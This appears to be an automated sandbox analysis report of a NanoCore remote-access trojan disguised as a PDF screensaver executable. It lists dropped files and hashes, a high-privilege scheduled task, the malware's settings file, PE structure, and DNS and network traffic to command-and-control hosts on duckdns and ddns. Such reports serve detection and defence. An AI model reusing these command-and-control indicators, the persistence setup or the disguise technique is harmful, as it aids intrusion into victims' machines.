          SHA-512:A4EEF16E2C05DAA7100DCBA1C6044D3333BB947DC79EE66817EF5394E8355686A2A51A0C0F2BE1DE917EDC7E9AD663F34E49380709F356499C95683651951A78
          Malicious:false
          Reputation:unknown
          Preview:...................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):45152
          Entropy (8bit):6.149629800481177
          Encrypted:false
          SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
          MD5:2867A3817C9245F7CF518524DFD18F28
          SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
          SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
          SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Reputation:unknown
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1309
          Entropy (8bit):5.0990514427386
          Encrypted:false
          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK04kxtn:cbk4oL600QydbQxIYODOLedq35kj
          MD5:77AF6D1744407EBD7E0CEC16F3C7168D
          SHA1:FF4E58917D1AB719E40C68542F663121299DAE67
          SHA-256:A519EB5414D05AC7565B5399D9F1EF717D6846695221B21B51820AA69120EDDC
          SHA-512:529FD47B0605315DDD60D10A99A4830C234C5046C9EE575524C3FC85105C701DCD8EEA4F2A1D8AE444D2E42A2CEF37CE23FB9A2BAF4CB0BAA91B590FB555E691
          Malicious:true
          Reputation:unknown
          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1310
          Entropy (8bit):5.109425792877704
          Encrypted:false
          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
          Malicious:false
          Reputation:unknown
          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:data
          Category:dropped
          Size (bytes):8
          Entropy (8bit):3.0
          Encrypted:false
          SSDEEP:3:ZSp:Q
          MD5:6C844091DCB061AD2B62761D1939F235
          SHA1:813C89B6606B3A5510FD924A02BAFCC6FE2B8574
          SHA-256:FBC2997715CCA9BD5F3F08FB0FABD33DD3D13489C40E47952208ED854127AA2C
          SHA-512:62CE0F17F06E366D2CBE8C1C73569D39D50BA3EB2403C8AAD48314B213166A3DC5538375992D3FD99827565B720B029244379A854EAA189EE3B0E0F33D50D665
          Malicious:true
          Reputation:unknown
          Preview:Fb..7..H
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):46
          Entropy (8bit):4.3523814564716385
          Encrypted:false
          SSDEEP:3:oNUkh4E2J5xAIwGMNn:oN923fA
          MD5:E01C7B4BFFC4D8966DFDD6831E4904F7
          SHA1:FE638E970FB82742E2C4D7EA3AE7E043589304FB
          SHA-256:ECFA3D73848685C232F4B352A5E24F4995B7D55FF4130A26B7BAEB3839280300
          SHA-512:FD9C41391E076E66F9A65DF18CA790EF06518B8033A5D24BF631E6E7F5EACECF34AD2AA7197FEB8B8FC7ED571A3BEFA0C8C940631F6EE5C0F5996D703B6AC50A
          Malicious:false
          Reputation:unknown
          Preview:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):90
          Entropy (8bit):4.969700668999775
          Encrypted:false
          SSDEEP:3:YRRvutvEOVBJcRAoovKXRGdY2JRMow7:AvCEOVHcoXzpi
          MD5:B48D7F5C0CC7E6A4C737BE0D827B9867
          SHA1:906E2605871B8F319FA2A455C06F2E53940ED777
          SHA-256:B2BACD88BAFE8C668A45AB03A2D5647A9BDDA6CF1361FC821D5A70480B8CCB69
          SHA-512:9E3F4634AF71BCD600576BBD09EBC569E8D5D286ACD07D8E516AD61A80D3447156AEACB59194F24D9C39A1BBE666E038375A94E4AA5A7821D971FD166A7DD694
          Malicious:false
          Reputation:unknown
          Preview:[S3tt!ng]..stpth=%localappdata%\temp..Key=Chrome..Dir3ctory=Folder8_410..ExE_c=itugx.exe..
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1141
          Entropy (8bit):4.44831826838854
          Encrypted:false
          SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
          MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
          SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
          SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
          SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
          Malicious:false
          Reputation:unknown
          Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.826498922764083
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:026910003102350.pdf.scr.exe
          File size:1064658
          MD5:c2a80ccf6362bba805072de9ce963ea5
          SHA1:c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
          SHA256:592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
          SHA512:377fbc8008b63f9380ebe0a90db28a191fd3f0eea97dd10e6f16607eb42c51f713cbfb744f2ce73b74093f4866a05e3b00ec7f8b57e2bff2c6a9c8f2118ce707
          SSDEEP:24576:9TbBv5rUeTA/TYaxVKPijItG0bKL1xRMa2LSmnbrDrF:XBvIHBMG02L1N29rDx
          TLSH:95351202BEC196B2D0A3093256767721B97DB9601F68CEDFA3D1466CAD325C0E7317B2
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
          Icon Hash:938c8c90b2ea6ab2
          Entrypoint:0x41f530
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:12e12319f1029ec4f8fcbed7e82df162
          Instruction
          call 00007FF9B4BF9B7Bh
          jmp 00007FF9B4BF948Dh
          int3
          int3
          int3
          int3
          int3
          int3
          push ebp
          mov ebp, esp
          push esi
          push dword ptr [ebp+08h]
          mov esi, ecx
          call 00007FF9B4BEC2D7h
          mov dword ptr [esi], 004356D0h
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          and dword ptr [ecx+04h], 00000000h
          mov eax, ecx
          and dword ptr [ecx+08h], 00000000h
          mov dword ptr [ecx+04h], 004356D8h
          mov dword ptr [ecx], 004356D0h
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          lea eax, dword ptr [esi+04h]
          mov dword ptr [esi], 004356B8h
          push eax
          call 00007FF9B4BFC91Fh
          test byte ptr [ebp+08h], 00000001h
          pop ecx
          je 00007FF9B4BF961Ch
          push 0000000Ch
          push esi
          call 00007FF9B4BF8BD9h
          pop ecx
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          push ebp
          mov ebp, esp
          sub esp, 0Ch
          lea ecx, dword ptr [ebp-0Ch]
          call 00007FF9B4BEC252h
          push 0043BEF0h
          lea eax, dword ptr [ebp-0Ch]
          push eax
          call 00007FF9B4BFC3D9h
          int3
          push ebp
          mov ebp, esp
          sub esp, 0Ch
          lea ecx, dword ptr [ebp-0Ch]
          call 00007FF9B4BF9598h
          push 0043C0F4h
          lea eax, dword ptr [ebp-0Ch]
          push eax
          call 00007FF9B4BFC3BCh
          int3
          jmp 00007FF9B4BFDE57h
          int3
          int3
          int3
          int3
          push 00422900h
          push dword ptr fs:[00000000h]
          Programming Language:
          • [ C ] VS2008 SP1 build 30729
          • [IMP] VS2008 SP1 build 30729
          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x4a8c | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x69000 | 0x233c | .reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x1000 | 0x31bdc | 0x31c00 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata | 0x33000 | 0xaec0 | 0xb000 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data | 0x3e000 | 0x24720 | 0x1000 | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .didat | 0x63000 | 0x190 | 0x200 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc | 0x64000 | 0x4a8c | 0x4c00 | False | 0.6105571546052632 | data | 6.391160230365552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc | 0x69000 | 0x233c | 0x2400 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          Name | RVA | Size | Type | Language | Country
          PNG | 0x64524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
          PNG | 0x6506c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
          RT_ICON | 0x66618 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | |
          RT_DIALOG | 0x66740 | 0x286 | data | English | United States
          RT_DIALOG | 0x669c8 | 0x13a | data | English | United States
          RT_DIALOG | 0x66b04 | 0xec | data | English | United States
          RT_DIALOG | 0x66bf0 | 0x12e | data | English | United States
          RT_DIALOG | 0x66d20 | 0x338 | data | English | United States
          RT_DIALOG | 0x67058 | 0x252 | data | English | United States
          RT_STRING | 0x672ac | 0x1e2 | data | English | United States
          RT_STRING | 0x67490 | 0x1cc | data | English | United States
          RT_STRING | 0x6765c | 0x1b8 | data | English | United States
          RT_STRING | 0x67814 | 0x146 | data | English | United States
          RT_STRING | 0x6795c | 0x46c | data | English | United States
          RT_STRING | 0x67dc8 | 0x166 | data | English | United States
          RT_STRING | 0x67f30 | 0x152 | data | English | United States
          RT_STRING | 0x68084 | 0x10a | data | English | United States
          RT_STRING | 0x68190 | 0xbc | data | English | United States
          RT_STRING | 0x6824c | 0xd6 | data | English | United States
          RT_GROUP_ICON | 0x68324 | 0x14 | data | |
          RT_MANIFEST | 0x68338 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
          DLL | Import
          KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
          OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
          gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
          Language of compilation system | Country where language is spoken | Map
          English | United States |
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Feb 2, 2023 08:09:58.131228924 CET | 49700 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:10:01.243844986 CET | 49700 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:10:07.244303942 CET | 49700 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:10:24.303241014 CET | 49705 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:10:27.408564091 CET | 49705 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:10:33.418741941 CET | 49705 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:10:49.414972067 CET | 49707 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:10:52.435837984 CET | 49707 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:10:58.508714914 CET | 49707 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:11:07.956806898 CET | 49709 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:11:11.050592899 CET | 49709 | 60705 | 192.168.2.5 | 212.193.30.230
          Feb 2, 2023 08:11:17.053057909 CET | 49709 | 60705 | 192.168.2.5 | 212.193.30.230
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Feb 2, 2023 08:09:57.770723104 CET | 60841 | 53 | 192.168.2.5 | 8.8.8.8
          Feb 2, 2023 08:09:57.877348900 CET | 53 | 60841 | 8.8.8.8 | 192.168.2.5
          Feb 2, 2023 08:10:24.189878941 CET | 49724 | 53 | 192.168.2.5 | 8.8.8.8
          Feb 2, 2023 08:10:24.299720049 CET | 53 | 49724 | 8.8.8.8 | 192.168.2.5
          Feb 2, 2023 08:10:49.296843052 CET | 65323 | 53 | 192.168.2.5 | 8.8.8.8
          Feb 2, 2023 08:10:49.405663013 CET | 53 | 65323 | 8.8.8.8 | 192.168.2.5
          Feb 2, 2023 08:11:07.934437990 CET | 63446 | 53 | 192.168.2.5 | 8.8.8.8
          Feb 2, 2023 08:11:07.953950882 CET | 53 | 63446 | 8.8.8.8 | 192.168.2.5
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Feb 2, 2023 08:09:57.770723104 CET | 192.168.2.5 | 8.8.8.8 | 0x830a | Standard query (0) | december2n.duckdns.org | A (IP address) | IN (0x0001) | false
          Feb 2, 2023 08:10:24.189878941 CET | 192.168.2.5 | 8.8.8.8 | 0x17be | Standard query (0) | december2n.duckdns.org | A (IP address) | IN (0x0001) | false
          Feb 2, 2023 08:10:49.296843052 CET | 192.168.2.5 | 8.8.8.8 | 0x8dd7 | Standard query (0) | december2n.duckdns.org | A (IP address) | IN (0x0001) | false
          Feb 2, 2023 08:11:07.934437990 CET | 192.168.2.5 | 8.8.8.8 | 0x1c9a | Standard query (0) | december2nd.ddns.net | A (IP address) | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Feb 2, 2023 08:09:57.877348900 CET | 8.8.8.8 | 192.168.2.5 | 0x830a | No error (0) | december2n.duckdns.org | - | 212.193.30.230 | A (IP address) | IN (0x0001) | false
          Feb 2, 2023 08:10:24.299720049 CET | 8.8.8.8 | 192.168.2.5 | 0x17be | No error (0) | december2n.duckdns.org | - | 212.193.30.230 | A (IP address) | IN (0x0001) | false
          Feb 2, 2023 08:10:49.405663013 CET | 8.8.8.8 | 192.168.2.5 | 0x8dd7 | No error (0) | december2n.duckdns.org | - | 212.193.30.230 | A (IP address) | IN (0x0001) | false
          Feb 2, 2023 08:11:07.953950882 CET | 8.8.8.8 | 192.168.2.5 | 0x1c9a | No error (0) | december2nd.ddns.net | - | 212.193.30.230 | A (IP address) | IN (0x0001) | false

          Target ID:0
          Start time:08:09:32
          Start date:02/02/2023
          Path:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          Imagebase:0xcc0000
          File size:1064658 bytes
          MD5 hash:C2A80CCF6362BBA805072DE9CE963EA5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          Target ID:1
          Start time:08:09:46
          Start date:02/02/2023
          Path:C:\Windows\SysWOW64\wscript.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
          Imagebase:0x50000
          File size:147456 bytes
          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          Reputation:high

          Target ID:2
          Start time:08:09:54
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
